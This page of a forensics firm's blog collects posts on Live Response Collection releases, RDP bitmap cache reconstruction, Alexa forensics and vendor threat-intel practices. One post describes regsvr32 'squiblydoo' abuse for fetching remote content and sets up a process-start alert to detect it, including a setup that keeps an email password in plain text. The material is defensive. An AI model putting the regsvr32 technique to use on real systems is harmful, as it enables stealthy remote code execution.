Welcome to the BriMor Labs blog. BriMor Labs is located near Baltimore, Maryland. We specialize in offering Digital Forensics, Incident Response, and Training solutions to our clients. Now with 1000% more blockchain!

Showing posts with label "incident response". Show all posts

Thursday, September 5, 2019

Small Cedarpelta Update

Good morning readers and welcome back! This is going to be a very short blog post to inform everyone that a very minor update to the Cedarpelta version of the Live Response Collection has been published. This change was needed, as it was pointed out by an anonymous comment, that when a user chose one of the three "Secure" options, the script(s) failed due to an update to the SDelete tool. I changed the module to ensure that it works properly with the new version of the executable and published the update earlier this morning. As always, if you have any feedback or would like to see additional data be collected by the LRC, please let me know!

LiveResponseCollection-Cedarpelta.zip - download here

MD5: 7bc32091c1e7d773162fbdc9455f6432

SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63

Updated: September 5, 2019
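For anyone who wants to check a download against the published MD5 and SHA256 values, here is a minimal Python sketch. It is not part of the LRC; the function names are made up for illustration, and it simply uses the standard `hashlib` module to hash the file in chunks.

```python
import hashlib


def file_digests(path, chunk_size=1024 * 1024):
    """Return the MD5 and SHA-256 hex digests of a file, read in chunks."""
    md5 = hashlib.md5()
    sha256 = hashlib.sha256()
    with open(path, "rb") as handle:
        # Read in fixed-size chunks so large archives do not need to fit in memory
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest()}


def matches_published(path, expected_md5, expected_sha256):
    """True only if both digests match the published values (case-insensitive)."""
    digests = file_digests(path)
    return (digests["md5"] == expected_md5.strip().lower()
            and digests["sha256"] == expected_sha256.strip().lower())
```

Calling `matches_published("LiveResponseCollection-Cedarpelta.zip", "<published MD5>", "<published SHA256>")` should return `True` for an unmodified download, assuming the file sits in the current directory.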

Thursday, June 20, 2019

Phinally Using Photoshop to Phacilitate Phorensic Analysis

Hello again readers, and welcome back! Today's blog post is going to cover the process that I personally use to rearrange and correlate RDP Bitmap Cache data in Photoshop. Yes, I am aware that some of you know me primarily for my Photoshop productions in presentations and logos (and HDR photography, a hobby I do not spend nearly enough time on!), but the time has finally come when I can utilize Photoshop as part of my forensic analysis process!

First off, if you are not aware, when a user establishes an RDP (Remote Desktop Protocol) connection, there are files that are typically saved on the user’s system (the source host). These files have changed in name and in format over the years, but they are commonly stored under the path “%USERPROFILE%\AppData\Local\Microsoft\Terminal Server Client\Cache\”. You will usually have a file with a .bmc extension, and on Windows 7 and newer systems, you will also likely see files that are named “cache0000.bin” (these are incrementally numbered starting at 0000), which should be searchable by the naming convention of “cache{4-digits}.bin”. Both file types contain what are essentially small chunks of screenshots of the remote desktop. The most reliable tool that I have found to parse this data is bmc-tools, which can be downloaded from https://github.com/ANSSI-FR/bmc-tools. The process for extracting the data is straightforward: you point the script at a cache####.bin file and extract it to a folder of your choice. Once done, you end up with a folder filled with small bitmap images.
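If you need to hunt for these files across a collected profile, the naming convention above lends itself to a quick search. The following is only a sketch in Python, assuming the file names follow the "cache{4-digits}.bin" and .bmc patterns described here; the function name is hypothetical and this is not part of bmc-tools.

```python
import re
from pathlib import Path

# Assumption: cache files are named like cache0000.bin, cache0001.bin, ...
CACHE_BIN = re.compile(r"^cache\d{4}\.bin$", re.IGNORECASE)


def find_rdp_cache_files(cache_dir):
    """Return sorted paths of .bmc and cacheNNNN.bin files directly in cache_dir."""
    hits = []
    for entry in Path(cache_dir).iterdir():
        if not entry.is_file():
            continue
        name = entry.name
        # Match either the newer cacheNNNN.bin files or the older .bmc files
        if CACHE_BIN.match(name) or name.lower().endswith(".bmc"):
            hits.append(entry)
    return sorted(hits)
```

Point it at a copy of the "Terminal Server Client\Cache" folder from the source host, and each returned path is a candidate to feed into the extraction step.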

Now begins the phun part! The bitmaps will need to be rearranged manually to reconstruct the screenshot as best as is possible (like a jigsaw for forensic enthusiasts). This is not an exact science, and it relies on educated best-guess in many cases. While this could be a more manual and tedious process, Adobe Photoshop can be used to automate the import of the files. Then you can rebuild the item(s) as you see fit!

First, view the contents of the folder in Windows Explorer, or Adobe Bridge (included in the Adobe Photoshop CC bundle) for Mac users. I found that Preview does not work, as it does not render the bitmaps properly. Rather than spending valuable time trying to figure out why that is, I just used Bridge.



Next select the bitmaps of the activity you’d like to reconstruct, go into Photoshop, and choose "File-Scripts-Load Files into Stack...":



This will allow you to choose multiple files to import into Photoshop all at once. You will be presented with a “Load Layers” option. Select the “Browse” button, and then browse to the folder that contains the bitmap files you wish to load:

| The "Load Layers" dialogue box. In order to choose the file(s) you want to open, click "Browse..." |



| Choose the files that you wish to load |



Once you’ve selected the bitmap files, you will see the “Load Layers” box is populated with those files:

| Paste the layers into your original workspace, and rearrange them to rebuild the activity! |

I truly hope that this small tutorial helps with your process and workload should you find yourself rebuilding RDP session activity. For readers who do not currently own Photoshop, Adobe has a very inexpensive offering of the Adobe Creative Cloud (CC) for a personal license under the Photography plan, which is $9.99 a month. It is a great deal and one that I have used for my photography hobby for many years. And now on forensic analysis cases that involve RDP bitmap reconstruction!

Thursday, April 11, 2019

Live Response Collection - Cedarpelta

Hello again readers and welcome back!! Today I would like to announce the public release of updates to the Live Response Collection (LRC), which is named "Cedarpelta".

This may come as a surprise to some as Bambiraptor was released over two years ago, but over the past several months I've been working on adding more macOS support to the LRC. Part of the work that went into this version was a complete rewrite of all of the bash scripts that the LRC utilizes, which was no small task. Once the rewrite was completed, I focused on my never-ending goal of blending speed, comprehensive data collection, and internal logic to ensure that if something odd was encountered, the script would not endlessly hang or, even worse, collect data that was corrupted or not accurate. So, let's delve into some of the changes that Cedarpelta offers compared to Bambiraptor!

Windows Live Response Collection

To be honest, not a whole lot has changed on the Windows side. I added a new module at the request of a user, that collects Cisco AMP databases from endpoints, if the environment utilizes the FireAMP endpoint detection product. The primary reason for this is that the databases themselves contain a WEALTH of information, however users of the AMP console are limited to what they can see from the endpoints. The reason for this is likely because it would take a large amount of bandwidth and processing power to process every single item collected by the tool. Since most of this occurs within AWS, the processing costs would scale considerably, which in the end would end up costing more money to license and use.* (*Please note that I am not a FireAMP developer, and I do not know if this is definitely the case or not, but from my outsider perspective and experience in working with the product, this explanation is the most plausible. If any developers would like to provide a more detailed explanation, I will update this post accordingly!)

MacOS Live Response Collection

This is the section that has had, by far, the most work done to it. On top of the code rewrite, which makes the scripting more "proper" and also much, much faster, new logic was added to deal with things like system integrity protection (SIP) and files/folders that used to be accessible by default, but now are locked down by the operating system itself. Support has been added for:

- Unified Logs

- SSH log files

- Browser history files (Safari, Chrome, Tor, Brave, Opera)

- LSQuarantine events

- Even more console logs

- And many, many other items!

One of the downsides to the changes to macOS is the fact that things like SIP and operating system lock downs prevent a typical user from accessing data from certain locations. One example of this is Safari, where by default you cannot copy your own data out of the Safari directory because of the OS protections in place. There are ways around this, by disabling SIP and granting the Terminal application full disk access under Settings, but since the LRC was written to work with a system that is running with default configurations, it will attempt to access these protected files and folders, and if it cannot, it will record what it tried to do and simply move on. Some updates that are in the pipeline for newer versions of macOS may also require additional changes, but we will have to wait for those changes to occur first and then make the updates accordingly.
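The "attempt it, record what happened, and move on" approach can be illustrated with a short sketch. To be clear, the LRC itself is written in bash and this is not its code; it is a Python illustration of the same idea, with a hypothetical function name and logger.

```python
import logging
import shutil
from pathlib import Path

log = logging.getLogger("collection_sketch")


def collect_file(source, dest_dir):
    """Copy source into dest_dir; on failure, record the attempt and move on.

    Returns True if the file was copied, False otherwise.
    """
    source = Path(source)
    dest_dir = Path(dest_dir)
    dest_dir.mkdir(parents=True, exist_ok=True)
    try:
        shutil.copy2(source, dest_dir / source.name)
    except OSError as error:
        # OSError covers PermissionError (protected paths) and FileNotFoundError
        log.warning("Could not collect %s: %s", source, error)
        return False
    log.info("Collected %s", source)
    return True
```

The point of the design is that one locked-down file never stops the rest of the collection, and the log still shows that the attempt was made.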

You will most likely no longer be able to perform a memory dump or automate the creation of a disk image on newer versions of macOS with the default settings, because of the updates and security protections native within the OS internals. As I have stated in the past, if you absolutely require these items I highly recommend a solution such as Macquisition from BlackBag. The purpose of the LRC is, and will always be, to collect data from a wide range of operating systems in an easy fashion, and require little, if any, user input. It does not matter if you are an experienced incident response professional, or directed to collect data from your own system by another individual, you simply run the tool, and it collects the data.

Future Live Response Collection development plans

As always, the goal of the Live Response Collection is not only to collect data for an investigation, it is also able to be customized by any user to collect information and/or data that is desired by that user. Please consider taking the time to develop modules that extract data and share modules that you have already developed. The next update of the LRC will focus on newer versions of Windows (Windows 10, Server 2019, etc). I personally am still encountering very few of those systems in the wild, but that is mostly because I tend to deal with larger enterprises where adoption of a new operating system takes considerable time, compared to a typical user that runs down to Best Buy and has a new Windows 10 laptop because the computer they used for a few years no longer works.

Remember, a tool is a tool. It is never the final solution

One last note: please remember that while a lot of work has been put into the LRC to "just work", at the end of the day it is just a tool that is meant to enhance the data collection process. There are many open source tools available to collect data, perhaps more than ever before, and one tool may work where another one failed.

For example, you might try the CrowdStrike Mac tool and it might work where the LRC fails, or vice versa. Or you may try to use Eric Zimmerman's kape on a Windows machine, but it fails because the .NET Framework was not installed. Or you might try to use the LRC on a system running Cylance Protect and it gets blocked because of the "process spawning process" rule.

In each case you have to give various tools and methods a shot, with the end goal of collecting the information that you want. It is important to remember that YOU (the user of the tool) are the most valuable aspect of the data collection process, and you simply utilize tools to make the collection process faster and smoother!

LiveResponseCollection-Cedarpelta.zip - download here

MD5: 7bc32091c1e7d773162fbdc9455f6432

SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63

Updated: September 5, 2019

Wednesday, August 8, 2018

Live Response Collection Development Roadmap for 2018

Hello again readers and welcome back! It's been a little while ...OK, a long while... since I've made updates to the Live Response Collection. Rest assured for those of you who have used, and continue to use it, that I am still working on it, and trying to keep it as updated as possible. For the most part it has far exceeded my expectations and I have heard so much great feedback about how much easier it made data collections that users and/or businesses were tasked with. The next version of the LRC will be called Cedarpelta, and I am hoping for the release to take place by the end of this year.

As most Mac users have likely experienced by now, not only has Apple implemented macOS, they have also changed the file system to APFS, from HFS+. Because the Live Response Collection interacts with the live file system, this really does not affect the data collection aspects of the LRC, although it DOES affect third-party programs running on a Mac, as detailed in my previous blog post.

Although the new operating system updates limit what we can collect leveraging third-party tools, there are a plethora of new artifacts and data locations of interest, and to ensure the LRC is collecting data points of particular interest, I've been working with the most knowledgeable Apple expert that I (and probably a large majority of readers) know, Sarah Edwards (@iamevltwin and/or mac4n6.com). As a result of this collaboration, one of the primary features of the next release of the LRC will be much more comprehensive collections from a Mac!

For the vast majority of you who use the Windows version of the Live Response Collection, don't fret, because there will be updates in Cedarpelta for Windows as well! These will primarily focus on Windows 10 files of interest, but also will include some additional functionality for some of the existing third-party tools that it leverages, like autoruns.

| Autoruns 13.90 caused an issue, and was fixed very quickly once the issue was reported (thanks to @KyleHanslovan) |

As always, if there are any additional features that you would like to see the LRC perform, please reach out to me, through Twitter (@brimorlabs or @brianjmoran) or the contact form on my website (https://www.brimorlabs.com/contact/) or even by leaving a comment on the blog. I will do my best to implement them, but remember, the LRC was developed in a way that allows users to create their own data processing modules, so if you have developed a module that you regularly use, and you would like to (and have the authority to) share it, please do, as it will undoubtedly help other members of the community as well!

Friday, April 6, 2018

Fishing for work is almost as bad as phishing (for anything)

Hello again readers and welcome back! The topic of today's blog post is something that we posted on a few years back, but unfortunately it’s worth repeating again. Companies (both large and small) who provide any kind of cyber security services have a responsibility to anyone they interact with to be completely transparent particularly when words like “breach”, “victim”, and “target” start getting thrown around. Case in point is an email that a client received from a large, well-established, cyber security services company a few weeks ago that caused a bit of internal alarm that ultimately did not contain enough information to be actionable.

In short, sharing information, threat intelligence, tactics/techniques/procedures (TTPs), indicators of compromise (IOCs), etc is something that ALL of us in the industry need to do better. I applaud the sharing of IOCs and threat information (when it’s unclassified, obviously). If this particular email had simply contained that information in a timely manner, I would have applauded the initiative. Unfortunately the information sharing of a seven month old phish consisted of:

- four domains

- tentative attribution to Kazakhstan, but zero supporting evidence

- “new” (but, admittedly, unanalyzed) malware, including an MD5 hash, and of course,

- a sales pitch

The recipient of this email attempted to find out more information, but was ultimately turned off by the tone and was unsure whether the information was valid or just a thinly veiled sales pitch. They reached out to us directly for assistance.

I passed this particular information on to others within the information security field, and recently Arbor Networks actually put out a much more comprehensive overview of this activity, with a whole bunch of indicators and information that was not included, or even alluded to, in this particular email. I wish that more companies would take the initiative and do research into actors and campaigns such as this. If I were a CIO, and I was looking for a particular indicator from an email, but in searching for more information I came across the information in the Arbor post, I would be much more inclined to engage with Arbor if myself/my team needed external resources, than I would from an email that may have had good intentions, but felt like a services fishing expedition.

Additionally, no one wants to hear that their company or team has security issues, but responsible disclosure methods are always the way to go. However, it is hard for companies and individuals who are trying to do the right thing to highlight and address issues when “fishing for work” is so pervasive. I’ve seen many companies blow off security notifications as scams and ignore them completely, due precisely to this pervasive problem of fishing for work.

So ideally, how can we share information better?

- Join information sharing programs and network (Twitter, LinkedIn, conferences, etc.)

- Don’t “cold call” unless you have no other option. The process works much better when you already have a relationship (or know someone who does)

- Share complete, useful, and actionable information: recognize that not all companies can search the same way, due to limitations in resources available and even policy, regulations, and even privacy laws. Some companies cannot search by email, while others will need traditional IOCs (IPs, domains, hashes (not just MD5 hashes, also include SHA1 and SHA256 if you can)).

- Include the body of the phishing email and the complete headers--if the company is unable to search for the IOCs, they may be able to determine that it was likely blocked by their security stack

- Be timely. Sharing scant details of a phish from seven months ago goes well beyond the capabilities threshold of most companies

- Be selective in how and to whom you share. Sending these “helpful” notifications to C-levels is guaranteed to bring the infosec department to a full-stop while they work on only this specific threat, real, imagined, or incorrect. Which brings me to #7….

- Make sure (absolutely sure) you are correct. “Helpful notifications” that are based on incorrect information and lack of technical expertise are common enough that a large company could have days of downtime dedicated to them. (And if the client themselves points out your technical errors with factual observations, consider the possibility that you might be wrong, apologize profusely, and DO NOT keep calling every day)

Tuesday, January 30, 2018

Several minor updates to buatapa!

Hello again readers and welcome back! I am pleased to announce that today there is a brand new, updated version of buatapa! Over the past several months I've had requests for better in-script feedback on some of the ways that buatapa processed the results of autoruns, but I just have not had the free time to sit down and work on implementing them. The new version is a little more "wordy", as it tries the best that it can to help the user if there are processing problems. For example, if you did not run autoruns with the needed flags, buatapa will recognize that from the output file you are running it against and suggest you run autoruns again. For those on Mac (and maybe a few *nix systems), it also tells you if you do not have the proper permissions to access the autoruns output file.

There are also some slight changes to the interior processing and a little better logic flow. All in all, buatapa has held up quite well since the early testing nearly three years ago, and hopefully is a useful tool in helping to try to triage Windows systems within your environment.

If you have any questions or encounter any bugs/issues, please do not hesitate to reach out!

buatapa_0_0_7.zip - download here

MD5: 8c2f9dc33094b3c5635bd0d61dbeb979

SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162

Version 0.0.7

Updated: January 30, 2018

Tuesday, December 26, 2017

Amazon Alexa Forensic Walkthrough Guide

Hello again readers and welcome back! We are working on wrapping up 2017 here at BriMor Labs, as this was a very productive and busy year. One of the things that Jessica and I have been meaning to put together for quite some time was a small document summarizing the URLs to query from Amazon to return some of the Amazon Echosystem data.

After several months, we (cough cough Jessica) finally were able to get the time to put it together and share it with all of you. We hope that it is helpful during your investigations and analysis, and if you need anything else please do not hesitate to reach out to Jessica or myself!

Alexa Cloud Data Reference Guide

Monday, June 26, 2017

A Brief Recap of the SANS DFIR Summit

Hello again readers and welcome back!! I had the pleasure of attending (and speaking at, more on that in a bit!) the 10th SANS DFIR Summit this past week. It is one conference that I always try to attend, as it always has a fantastic lineup of DFIR professionals speaking about amazing research and experiences that they have had. This year was, of course, no exception, as the two day event was filled with incredible talks. The full lineup of slides from the talks can be found here. This was also the first year that the presenters had "walk-up music" before the talks.

This year, my good friend Jessica Hyde and I gave a presentation on the Amazon "Echo-system" in a talk we titled "Alexa, are you Skynet". We even brought a slight cosplay element to the talk as I dressed up in a Terminator shirt and Jessica went full Sarah Connor! One other quick note about our talk that I would like to add, is we chose the song "All The Things" by Dual Core as our walk-up music. Dual Core actually lives in Austin and fortunately his schedule allowed him to attend our talk. It was really cool having the actual artist who performed our walk-up music be in attendance at our talk!

| Jessica and I speaking about the Amazon Echo-system at the 2017 SANS DFIR Summit |

We admittedly had a LOT of slides and a LOT of material to cover, but if you have attended any of our presentations in the past, the reason our slide decks tend to be long is that we want to make sure that the slides themselves can still paint a pretty good picture of what we talked about. This way, even if you were not fortunate enough to see our presentation, you can follow along with the slides, and they can also serve as reference points during future examinations. We received a lot of really great comments about our talk and had some fantastic conversations afterwards as well, so hopefully if you attended you enjoyed it!

My other favorite part of the DFIR Summit is getting to see colleagues and friends that you interact with throughout the year, actually in person and not just as a message box in a chat window! Even though some of us live fairly close to each other in the greater Baltimore/DC area, we fly 1500 miles every summer to hang out for a few days. While in Austin several of us had some discussions about trying to start some local meetup type events on a more regular basis, so there definitely will be more on that to follow in the coming weeks!

Labels: "All The Things", "BriMor Labs", "DFIR Summit", "digital forensics", "Dual Core", "Echo-system", "incident response", "TP-Link", Alexa, Amazon, Austin, DFIR, Echo, IOT, kasa, SANS, Texas

Monday, December 12, 2016

Live Response Collection - Bambiraptor

Good news everyone!! After a fairly busy year, the past few weeks I have finally had enough down time to work on adding some long overdue, and hopefully highly anticipated, features to the Live Response Collection. This version, named Bambiraptor, fixes some of the small issues that were pointed out in the scripts. It makes it a little more pronounced that I am using the Belkasoft RAM Capture tool in the collection, by way of an additional file created in both the 32 and 64 bit folders, at the request of the great folks over at Belkasoft. It fixes the autoruns output being the csv file twice, rather than one csv and one easy to read text file. It adds some additional logic to ensure that the "secure" options actually secure the data, and it includes a couple of minor text fixes to the output. The biggest change is on the OSX side though, so without further ado, we shall dive into that!

The biggest change on the OSX side is the addition of automated disk imaging. It uses the internal "dd" command to do this, so again, be aware that if you suspect your system may be SEVERELY compromised, this may generate inconsistent output. If that is the case, you should probably be looking at a commercial solution such as Blackbag's Macquisition to acquire the data from a system. Remember, the Live Response Collection is simply another tool in your arsenal, and while it does have some pretty robust capabilities, always be sure that you test and verify that it is working properly within your environment. I have tried my best to ensure that it either works properly or fails, but as there are different flavors of Mac hardware and software, it gets harder and harder to account for every possibility (this, along with the fact that I see way more Windows systems than OSX/*nix systems in the wild, is why my development plan is Windows first, followed by OSX, followed by *nix).



With the addition of the disk imaging, there are now a total of three scripts that you can choose to run on an OSX system. They are self explanatory, just like on the Windows side. However, unlike the Windows side, you MUST run the script with super user privileges, or else the memory dump & disk imaging will not occur. (The Windows side is set to run automatically as Administrator as long as you click the proper pop ups; OSX, to my knowledge, does not have this option.)

I have purposely held off on releasing "secure" options on the OSX side because I want quite a bit more real-world testing to hopefully identify and eliminate any bugs before starting to secure the data automatically. The reason for this, is again, it is more difficult to account for small changes that can have a big impact on the OSX side and I want to ensure the script(s) are working as properly as possible before encrypting and securely erasing collected data, as I don't want to have to run process(es) more than once because one system does not understand a single quotation mark compared to a double quotation mark.

I hope you have a chance to use the Live Response Collection, and as always, if you identify any issues with it, if you find any bugs, or if there are any additional features you would like to add, please let me know. The roadmap for next year includes rewriting portions of the OSX script to better adhere to bash scripting security guidelines, adding secure options to the OSX side, and adding memory dump & automated disk imaging to *nix systems, as well as continuing to add updates and features to the scripts as needed and/or requested.

LiveResponseCollection-Cedarpelta.zip - download here

MD5: 7bc32091c1e7d773162fbdc9455f6432

SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63

Updated: September 5, 2019

Friday, April 22, 2016

Very quick blog post on "squiblydoo"

Hello again readers, it has been busy over here for the past few months, but over the past few days there has been some really interesting research done by Casey Smith (@subTee) regarding COM+ objects, specifically using regsvr32 to access external sites (cough cough potentially malware), cleverly named "squiblydoo". The original blog post is here. Apparently it leaves almost no trace on the system, for which I reference a quick look at running it in Noriben:

| Brian Baskin's tweet regarding results of Noriben looking at "squiblydoo" |

Now, I am sure some of you are thinking, "so what, <fill in thoughts here>", because after all, several of the things in the past that we were supposed to get all spun up about (most recently, the debacle that was "badlock") have really turned out to be a lot of marketing hype and not much else. Well, this is something that you should take note of. Until/unless regsvr32 is modified to change the way that it works, there is very little left on the system itself to show that something bad happened. There have been several well respected experts weighing in on this issue (browsing for it will likely give you more information than you ever wanted to know) and the general consensus is that this is pretty worrying.

| Twitter weighs in on "squiblydoo" |

So, what to do? It is very likely that how often regsvr32 actually gets called is dependent on what you do in your environment. It really should never hit the internet, for anything (I will note that statement has not been fully determined yet), but what I have found to be the most successful solution thus far in limited testing is using the open source tool "Process Notifier". It is pretty easy to set up: you run the proper flavor (32 or 64 bit), choose "Processes to Monitor", then type "regsvr32.exe" as your process name to check, choose "Started" and click "Add", then "Apply" and "Save".

| Process Notifier options |

| Adding regsvr32 to the processes to monitor list |

Then you can set up the email alerts under "E-mail Settings", by choosing your send to email address, the message subject, and message body, and even take a screenshot if you'd like under "Message". The next part is very important: under "SMTP" I highly recommend creating a one-time throwaway Gmail account for this, because it does save the account password in plain text on the system. Once you do all of these steps, again choose "Apply" and "Save".

| "Message" options under E-mail Settings |

| "SMTP" options under E-mail Settings |

| My emailed alert on regsvr32, complete with screenshot! |

| Command prompt running regsvr32 captured in the screenshot! |

It is important to note that if this was used maliciously, having the alert on regsvr32 means it will take the screenshot when the process starts. So you may not see your shell (or whatever else was done) but you should see the site/file that it references. And even if it downloads malware that cleans up after itself and squiblydoo, the email should have been sent before that actually happens, so (fingers crossed) you will hopefully get a notification. And if you do get a notification, this would probably be a really good time to at least start gathering data from the system, most likely at least memory and volatile data (hmm...sounds like a good job for the Live Response Collection!)

Unfortunately, this only detects that regsvr32 was started; it does not have the capability to look for URLs in the command itself, but it should be a pretty useful quick check to see if it gets called. If your environment actually does use regsvr32 on a regular basis, this will get very noisy and a different solution will have to be found. It is also very important to remember that a considerable amount of testing still has to be done to remedy this situation, so this (or any other method) should only be a temporary fix until a long-term, viable solution is presented, which is what we are all working toward!
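If you do have a way to capture the full command line (from process creation logging, for example), checking it for a URL is not much code. What follows is only a rough sketch in Python, not something Process Notifier can do: the function name `regsvr32_urls` and the example.com address are made up for illustration, and the executable check assumes the path to regsvr32 contains no spaces.

```python
import re
from typing import List

# Anything that starts with http:// or https:// and runs to the next whitespace.
URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)


def regsvr32_urls(command_line: str) -> List[str]:
    """Return the URLs found in a regsvr32 command line, or [] otherwise."""
    parts = command_line.strip().split(None, 1)
    if not parts:
        return []
    # Reduce the first token to a bare, lowercase executable name.
    exe = parts[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in ("regsvr32", "regsvr32.exe"):
        return []
    # Trim any quote characters left hanging on the end of a match.
    return [url.rstrip("\"'") for url in URL_PATTERN.findall(command_line)]


if __name__ == "__main__":
    sample = "regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll"
    print(regsvr32_urls(sample))
```

An empty list means either that the command was not regsvr32 or that no URL was present, so anything non-empty is worth a closer look.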

Tuesday, January 12, 2016

Live Response Collection - Allosaurus

Hello readers and welcome back! Today we are proud to announce the newest round of updates to the Live Response Collection, specifically with a focus on some new features on the OSX side!

Improved OSX features!

The biggest change is that the OSX version of the Live Response Collection now creates a memory dump using osxpmem, as long as you run the program with root privileges. The script does the internal math, just like on the Windows side, to make sure that you have enough free space on your destination, regardless of whether it is an internal or external drive. I have encountered cases where OSX provides differently formatted results for the sizes (sometimes throwing in things like an equal sign or a random letter), and I tried to account for that as much as possible. If you encounter a bug with the memory dump please let me know and I will try to figure it out, but as I have done more and more work on the OSX side I have come to realize just how terrible OSX is. For example, some Apple programs do not work properly if they were created on Yosemite and are run on El Capitan...so much for "it just works"! If you encounter any issues, I will try to get to the bottom of them as best as I can though!
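To give an idea of what that "internal math" looks like, here is a small Python sketch. It is not the code from the Live Response Collection (which is a shell script); the function names are hypothetical, and it assumes the memory size arrives as a number of bytes with some stray characters around it.

```python
import re
import shutil


def parse_size_bytes(text: str) -> int:
    """Return the first run of digits in `text` as an integer.

    Stray characters such as '=' or a trailing letter are ignored.
    Assumption: the number is already expressed in bytes.
    """
    match = re.search(r"\d+", text)
    if match is None:
        raise ValueError("no digits found in %r" % text)
    return int(match.group())


def has_room_for_dump(memory_bytes: int, free_bytes: int, margin_bytes: int = 0) -> bool:
    """True if the destination can hold a dump of `memory_bytes` plus a margin."""
    return free_bytes >= memory_bytes + margin_bytes


def destination_has_room(memory_text: str, destination: str) -> bool:
    """Compare the parsed memory size with the free space at `destination`."""
    free_bytes = shutil.disk_usage(destination).free
    return has_room_for_dump(parse_size_bytes(memory_text), free_bytes)


if __name__ == "__main__":
    # "= 17179869184" stands in for oddly formatted size output.
    print(destination_has_room("= 17179869184", "."))
```

Keeping the parsing separate from the comparison makes it easier to handle a new, oddly formatted size without touching the rest of the check.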

The other main OSX feature is a topic that was briefly touched on during the Forensic Lunch on Friday. Dave, Nicole, and James talked about the FSEvents Parser that they wrote. If you run the script with root privileges, the script will copy the fseventsd data to the corresponding destination folder, and then you can run their tool to go through the data. (NOTE: It is best to transfer the data to a Windows machine to do this, otherwise the fseventsd data may be hidden from you, depending on how the access permissions on your machine are set.)

A new naming scheme!

As you may have noticed, the title is "Live Response Collection - Allosaurus". I decided to go with the names of dinosaurs to differentiate between Live Response Collection versions, which will help ensure that you are using the latest build and will also help with tracking down any bugs that may pop up. Sometimes a bug that is reported has been fixed in a newer release, but because of the old naming scheme, it wasn't immediately clear if you were actually using the latest build.

As always, please do not hesitate to contact me if you have any questions or comments regarding the Live Response Collection.

LiveResponseCollection-Cedarpelta.zip - download here

MD5: 7bc32091c1e7d773162fbdc9455f6432

SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63

Updated: September 5, 2019
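If you want to confirm that your download matches the MD5 and SHA256 values listed above, a few lines of Python will do it. This is just a sketch using the standard `hashlib` module; the function names are my own for illustration, and the file name in the usage example assumes you saved the zip in the current directory.

```python
import hashlib


def file_digests(path, chunk_size=1024 * 1024):
    """Return (md5_hex, sha256_hex) for the file at `path`, read in chunks."""
    md5 = hashlib.md5()
    sha256 = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def matches_published(path, expected_md5, expected_sha256):
    """True only if both digests match the published values (case-insensitive)."""
    md5_hex, sha256_hex = file_digests(path)
    return md5_hex == expected_md5.lower() and sha256_hex == expected_sha256.lower()


if __name__ == "__main__":
    import sys

    # Usage: python verify.py LiveResponseCollection-Cedarpelta.zip
    ok = matches_published(
        sys.argv[1],
        "7bc32091c1e7d773162fbdc9455f6432",
        "2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63",
    )
    print("hashes match" if ok else "hashes DO NOT match")
```

Reading the file in chunks keeps memory use low, which matters for a large archive.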

Thursday, January 7, 2016

Cyber Security Snake Oil

Hello again readers and welcome back! Today's blog post is going to cover the kind of incident that unfortunately occurs WAY too often in the cyber-security realm, especially on the topic of "threat intelligence" or "advanced analytics" or whatever other buzzwords the marketing folks are spinning since it is now 2016. I had originally planned to write this post toward the end of the month, but the more I thought about the whole incident the angrier I got, so I am posting it much earlier than I had anticipated.

The subject of today's post involves a very large company. I have redacted their name and information at the request of the company involved and will be referring to them as "Kelvarnsen Industries" and an external company that I will call "Mountebank Labs". (FULL DISCLOSURE: I have not had any dealings, personally, with any member of Mountebank Labs but I have since spoken with several individuals who have). Apparently a few days ago, the CEO of Mountebank Labs sent an email to the CIO of Kelvarnsen Industries informing them of "an early warning about an email they have received (or are about to receive) that contained malware [sic]". A friend of mine works at Kelvarnsen Industries and asked my opinion about the email, which was flagged internally by the CIO as a phishing attempt because his first name was wrong (not just spelled wrong, his name was actually wrong), the message contained a slew of grammatical errors and sentences that made no sense, and referenced something that really did not seem possible. Honestly the most disturbing piece of the email sent from Mountebank Labs is that it appears they are actually targeting Kelvarnsen Industries in their "threat intelligence" platform:

| "Alert" information sent from Mountebank Labs CEO to Kelvarnsen Industries CIO |

I took a look at the referenced data and was able to easily determine that it was an email that was sent ENTIRELY internally, as the policy for Kelvarnsen Industries is to upload suspected malicious emails with attachments directly to VirusTotal. Yes, you read that 100% correctly. The email appeared to come FROM a legitimate internal user, sent TO a legitimate internal user...because....wait for it....THAT IS EXACTLY WHAT HAPPENED!!!

To take a quote from their blog post, in which they wrote about this as a "win" (with my own comments added in BOLD):

| Excerpt from blog post, with my own comments added |

Now, we can argue the merits of uploading samples to VirusTotal or doing analysis on them internally first. In this case, I personally happen to support the former, because there is no need for the internal CIRT to respond to an email that contained an attachment which solely installs a toolbar for "Decent Looking Mail Order Brides", so the VirusTotal results determine the internal escalation of the email. If an actual advanced threat group is trying to infiltrate an organization and they have a piece of malware uploaded to VirusTotal and the whole world can see it, so what? It means that they have been discovered and will probably have to come up with something new in an effort to achieve their goal of infiltrating their target. VirusTotal is simply a tool that we can use; it is not the end-all, be-all solution (see malware, polymorphic).

There are a limited number of individuals and companies that work in our profession, but that number is growing every single day. Unfortunately this growth also brings with it individuals who misrepresent their capabilities and their understanding of pertinent information, but are more than happy to sell you products and services that usually come with very expensive price tags. In this particular case, it looks like Mountebank Labs is loading domains into VirusTotal and, when a hit comes back, shooting off an email to the CISO or CIO of the company and "alerting" them. While there is nothing "wrong" with that aspect of it (although frankly, I don't know how you can have the time or resources to do that, as everyone that I know has plenty of work with their own clients and does not need to put out a blanket domain search in VirusTotal in an effort to drum up work), in my opinion it is not the right thing to do.

